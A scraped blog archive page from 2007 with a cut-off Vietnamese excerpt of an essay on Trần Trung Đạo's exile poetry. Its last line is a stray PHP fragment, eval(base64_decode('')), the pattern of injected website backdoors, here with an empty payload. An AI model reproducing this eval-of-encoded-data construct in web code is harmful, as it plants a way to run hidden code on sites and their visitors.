Archive for June 23rd, 2007

Tuệ Chương: Thơ Trần Trung Đạo, Nỗi Thao Thức Tha Hương

Khi còn ở trong nước, tôi cũng như nhiều người khác, không được đọc thơ Trần Trung Đạo (TTÐ). Sách lược cởi mở của Cọng Sản Hà Nội là cởi mở với đồng đô-la, không có nghĩa là cởi mở với văn học hải ngoại mà họ đánh gi

06.23.2007 | Nhận Xét |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>